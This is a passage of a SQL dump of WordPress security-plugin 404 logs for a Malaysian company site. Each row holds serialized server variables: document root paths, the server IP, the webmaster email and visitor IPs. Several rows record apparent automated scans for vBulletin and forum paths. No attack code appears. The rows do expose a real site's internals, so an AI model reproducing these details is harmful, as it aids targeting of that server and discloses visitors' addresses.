SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsVv4hQ4pD4smMfGAQs@wAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569396159.3903\";s:12:\"REQUEST_TIME\";s:10:\"1569396159\";}}','notice','2019-09-25 07:22:40','2019-09-25 07:22:39',30758472,32567688,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26967,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/forum/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"http://bintara.com.my/forum/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/forum/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsb@a0h3xiEgDLh@Jm@AQAAABE\";s:12:\"REDIRECT_URL\";s:7:\"/forum/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"49754\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"http://bintara.com.my/forum/\";s:10:\"SCRIPT_URL\";s:7:\"/forum/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsb@a0h3xiEgDLh@Jm@AQAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397753.1155\";s:12:\"REQUEST_TIME\";s:10:\"1569397753\";}}','notice','2019-09-25 07:49:14','2019-09-25 07:49:13',30749784,32554824,'http://bintara.com.my/forum/',1,0,'45.93.20.4'),(26968,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/forums/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"http://bintara.com.my/forums/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/forums/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsb-IhQ4pD4smMfGAQwLAAAAJE\";s:12:\"REDIRECT_URL\";s:8:\"/forums/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"55944\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"http://bintara.com.my/forums/\";s:10:\"SCRIPT_URL\";s:8:\"/forums/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsb-IhQ4pD4smMfGAQwLAAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397756.2774\";s:12:\"REQUEST_TIME\";s:10:\"1569397756\";}}','notice','2019-09-25 07:49:18','2019-09-25 07:49:16',30745152,32556032,'http://bintara.com.my/forums/',1,0,'45.93.20.4');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (26969,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:4:\"/vb/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:25:\"http://bintara.com.my/vb/\";s:19:\"REDIRECT_SCRIPT_URL\";s:4:\"/vb/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsb-4hQ4pD4smMfGAQwLQAAAIo\";s:12:\"REDIRECT_URL\";s:4:\"/vb/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"55944\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:25:\"http://bintara.com.my/vb/\";s:10:\"SCRIPT_URL\";s:4:\"/vb/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsb-4hQ4pD4smMfGAQwLQAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397759.0994\";s:12:\"REQUEST_TIME\";s:10:\"1569397759\";}}','notice','2019-09-25 07:49:21','2019-09-25 07:49:19',30746728,32559792,'http://bintara.com.my/vb/',1,0,'45.93.20.4'),(26970,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/vbulletin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/vbulletin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/vbulletin/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYscAq0h3xiEgDLh@Jm@CAAAABQ\";s:12:\"REDIRECT_URL\";s:11:\"/vbulletin/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"36182\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/vbulletin/\";s:10:\"SCRIPT_URL\";s:11:\"/vbulletin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYscAq0h3xiEgDLh@Jm@CAAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397762.4334\";s:12:\"REQUEST_TIME\";s:10:\"1569397762\";}}','notice','2019-09-25 07:49:24','2019-09-25 07:49:22',30745960,32563496,'http://bintara.com.my/vbulletin/',1,0,'45.93.20.4'),(26971,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/vb5/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:26:\"http://bintara.com.my/vb5/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/vb5/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYscBK0h3xiEgDLh@Jm@CgAAABI\";s:12:\"REDIRECT_URL\";s:5:\"/vb5/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"36182\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:26:\"http://bintara.com.my/vb5/\";s:10:\"SCRIPT_URL\";s:5:\"/vb5/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYscBK0h3xiEgDLh@Jm@CgAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397764.9201\";s:12:\"REQUEST_TIME\";s:10:\"1569397764\";}}','notice','2019-09-25 07:49:26','2019-09-25 07:49:25',30749624,32555800,'http://bintara.com.my/vb5/',1,0,'45.93.20.4'),(26972,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:34:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/vbulletin5/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:100:\"Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/vbulletin5/\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/vbulletin5/\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYscB4hQ4pD4smMfGAQwLgAAAIQ\";s:12:\"REDIRECT_URL\";s:12:\"/vbulletin5/\";s:11:\"REMOTE_ADDR\";s:10:\"45.93.20.4\";s:11:\"REMOTE_PORT\";s:5:\"47384\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/vbulletin5/\";s:10:\"SCRIPT_URL\";s:12:\"/vbulletin5/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYscB4hQ4pD4smMfGAQwLgAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397768.0289\";s:12:\"REQUEST_TIME\";s:10:\"1569397768\";}}','notice','2019-09-25 07:49:29','2019-09-25 07:49:28',30746752,32553584,'http://bintara.com.my/vbulletin5/',1,0,'45.93.20.4'),(26973,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Publisher 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:2:\"10\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"31D5143E-08FD-4C64-B23F-EB4D02CB35B8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYscNa0h3xiEgDLh@Jm@KQAAABA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.168.99\";s:11:\"REMOTE_PORT\";s:5:\"39336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYscNa0h3xiEgDLh@Jm@KQAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569397813.2601\";s:12:\"REQUEST_TIME\";s:10:\"1569397813\";}}','notice','2019-09-25 07:50:14','2019-09-25 07:50:13',31090848,32899544,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.168.99'),(26974,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:42:\"https://bintara.com.my/our-history/about1/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYsogq0h3xiEgDLh@JnHYAAAAA8\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:13:\"176.110.134.2\";s:11:\"REMOTE_PORT\";s:5:\"57711\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYsogq0h3xiEgDLh@JnHYAAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569400962.7602\";s:12:\"REQUEST_TIME\";s:10:\"1569400962\";}}','notice','2019-09-25 08:42:44','2019-09-25 08:42:43',30756984,32570368,'https://bintara.com.my/our-history/about1/',1,0,'176.110.134.2'),(26975,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.5155.400 QQBrowser/9.7.13231.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYso2PTT-ZZc8Zptu2CqdAAAAQo\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"53225\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYso2PTT-ZZc8Zptu2CqdAAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569401048.3777\";s:12:\"REQUEST_TIME\";s:10:\"1569401048\";}}','notice','2019-09-25 08:44:10','2019-09-25 08:44:08',30761704,32571544,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26976,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; 